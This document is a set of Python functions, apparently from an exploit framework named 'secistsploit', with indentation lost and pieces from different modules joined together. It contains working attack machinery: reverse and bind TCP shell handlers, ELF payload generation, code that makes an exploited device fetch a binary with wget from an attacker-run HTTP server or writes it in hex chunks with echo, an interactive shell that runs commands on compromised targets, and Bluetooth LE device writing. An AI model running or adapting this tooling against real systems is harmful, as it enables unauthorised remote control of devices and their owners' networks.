def bind_tcp(self):
# execute binary
commands = self.build_commands()
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute,
args=(commands[-1], ))
thread.start()
# connecting to shell
print_status("Connecting to {}:{}".format(self.options['rhost'],
self.options['rport']))
time.sleep(2)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options["rhost"], int(self.options["rport"])))
except socket.error:
print_error("Could not connect to {}:{}".format(
self.options["rhost"], self.options["rport"]))
return
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, "wb+") as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError("No such option as {}".format(
self.output))
return content
def command_run(self, *args, **kwargs):
print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except Exception as error:
print_error(error)
else:
if result is True:
print_success("Target is vulnerable")
elif result is False:
print_error("Target is not vulnerable")
else:
print_status("Target could not be verified")
def run(self):
print_status("Generating payload")
payload = self.generate()
if self.encoder:
payload = self.encoder.encode(payload)
if self.fmt:
payload = self.fmt.format(payload)
print_info(payload)
return payload
def http_server(self, lhost, lport):
print_status("Setting up HTTP server")
try:
server = HttpServer((lhost, int(lport)), HttpRequestHandler)
except socket.error:
self.port_used = True
self.mutex = False
return None
self.mutex = False
server.serve_forever(self.payload)
server.server_close()
def write(self, characteristic, data):
try:
dev = Peripheral(self, self.addrType)
services = sorted(dev.services, key=lambda s: s.hndStart)
print_status("Searching for characteristic {}".format(characteristic))
char = None
for service in services:
if char is not None:
break
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char = c
break
if char:
if "WRITE" in char.propertiesToString():
print_success("Sending {} bytes...".format(len(data)))
wwrflag = False
if "NO RESPONSE" in char.propertiesToString():
wwrflag = True
try:
char.write(data, wwrflag)
print_success("Data sent")
except Exception as err:
print_error("Error: {}".format(err))
else:
print_error("Not writable")
dev.disconnect()
except Exception as err:
print_error(err)
try:
dev.disconnect()
except Exception:
pass
return None
def enumerate_services(self):
print_status("Starting enumerating {} ({} dBm) ...".format(self.addr, self.rssi))
try:
dev = Peripheral(self, self.addrType)
services = sorted(dev.services, key=lambda s: s.hndStart)
data = []
for service in services:
if service.hndStart == service.hndEnd:
continue
data.append([
"{:04x} -> {:04x}".format(service.hndStart, service.hndEnd),
self._get_svc_description(service),
"",
"",
])
for _, char in enumerate(service.getCharacteristics()):
desc = self._get_char_description(char)
props = char.propertiesToString()
hnd = char.getHandle()
value = self._get_char(char, props)
data.append([
"{:04x}".format(hnd), desc, props, value
])
dev.disconnect()
return data
except Exception as err:
print_error(err)
try:
dev.disconnect()
except Exception as err:
print_error(err)
return None
def reverse_tcp(self):
all_interfaces = "0.0.0.0"
sock = self.listen(all_interfaces, self.options["lport"])
if self.port_used:
print_error("Could not set up listener on {}:{}".format(
all_interfaces, self.options["lport"]))
return
# execute binary
commands = self.build_commands()
print_status("Executing payload on the device")
# synchronized commands
for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute,
args=(commands[-1], ))
thread.start()
# waiting for shell
print_status("Waiting for reverse shell...")
client, addr = sock.accept()
sock.close()
print_status("Connection from {}:{}".format(addr[0], addr[1]))
print_success("Enjoy your shell")
t = telnetlib.Telnet()
t.sock = client
t.interact()
def wget(self):
print_status("Using wget method")
self.binary_name = random_text(8)
if "binary" in self.wget_options.keys():
binary = self.wget_options['binary']
else:
binary = "wget"
# run http server
all_interfaces = "0.0.0.0"
try:
server = HttpServer((all_interfaces, int(self.options["lport"])),
HttpRequestHandler)
except socket.error:
print_error("Could not set up HTTP Server on {}:{}".format(
self.options["lhost"], self.options["lport"]))
return False
thread = threading.Thread(target=server.serve_forever,
args=(self.payload, ))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -qO {}/{}".format(
binary, self.options["lhost"], self.options["lport"],
self.binary_name, self.location, self.binary_name)
self.exploit.execute(cmd)
thread.join(10)
if thread.is_alive():
assassin = threading.Thread(target=server.shutdown)
assassin.daemon = True
assassin.start()
return False
return True
def start(self):
""" secistsploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except secistsploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("secistsploit stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def btle_scan(self, mac=None):
""" Scans for Bluetooth Low Energy devices """
options = Options(
self.buffering,
mac,
self.enum_services
)
scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))
if options.mac:
print_status("Scanning BTLE device...")
else:
print_status("Scanning for BTLE devices...")
devices = []
try:
devices = [res for res in scanner.scan(self.scan_time)]
except Exception as err:
print_error("Error: {}".format(err))
print_error("Check if your bluetooth hardware is connected")
return devices
def echo(self):
print_status("Using echo method")
self.binary_name = random_text(8)
path = "{}/{}".format(self.location, self.binary_name)
# echo stream e.g. echo -ne {} >> {}
if "stream" in self.echo_options.keys():
echo_stream = self.echo_options["stream"]
else:
echo_stream = 'echo -ne "{}" >> {}'
# echo prefix e.g. "\\x"
if "prefix" in self.echo_options.keys():
echo_prefix = self.echo_options["prefix"]
else:
echo_prefix = "\\x"
# echo max length of the block
if "max_length" in self.echo_options.keys():
echo_max_length = int(self.echo_options["max_length"])
else:
echo_max_length = 30
size = len(self.payload)
num_parts = int(size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
for i in range(0, num_parts):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(
current, len(self.payload)))
block = str(
binascii.hexlify(self.payload[current:current +
echo_max_length]), "utf-8")
block = echo_prefix + echo_prefix.join(
a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
def run_threads(self, threads_number: int, target_function: any, *args,
**kwargs) -> None:
""" Run function across specified number of threads
:param int thread_number: number of threads that should be executed
:param func target_function: function that should be executed accross specified number of threads
:param any args: args passed to target_function
:param any kwargs: kwargs passed to target function
:return None
"""
threads = []
threads_running = threading.Event()
threads_running.set()
for thread_id in range(int(threads_number)):
thread = threading.Thread(
target=target_function,
args=chain((threads_running, ), args),
kwargs=kwargs,
name="thread-{}".format(thread_id),
)
threads.append(thread)
print_status("{} thread is starting...".format(thread.name))
thread.start()
start = time.time()
try:
while thread.isAlive():
thread.join(1)
except KeyboardInterrupt:
threads_running.clear()
for thread in threads:
thread.join()
print_status("{} thread is terminated.".format(thread.name))
print_status("Elapsed time: {} seconds".format(time.time() - start))
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
path = "secistsploit/modules/payloads/{}/".format(architecture)
# get all payloads for given architecture
all_payloads = [
f.split(".")[0] for f in listdir(path) if isfile(join(path, f))
and f.endswith(".py") and f != "__init__.py"
]
payload_path = path.replace("/", ".")
for p in all_payloads:
module = getattr(
importlib.import_module("{}{}".format(payload_path, p)),
'Payload')
# if method/arch is cmd then filter out payloads
if method is "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success(
"Welcome to cmd. Commands are sent to the target via the execute method."
)
print_status(
"For further exploitation use 'show payloads' and 'set payload <payload>' commands."
)
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
payload._Payload__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append(
(p, available_payloads[p]._Payload__info__["name"],
available_payloads[p]._Payload__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([
option,
getattr(payload, option),
payload.exploit_attributes[option][1]
])
if payload.handler == "bind_tcp":
options.append(
["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(
["lhost", "", "Connect-back IP address for wget"])
options.append(
["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(
c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options,
**params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options,
**params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options,
**params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))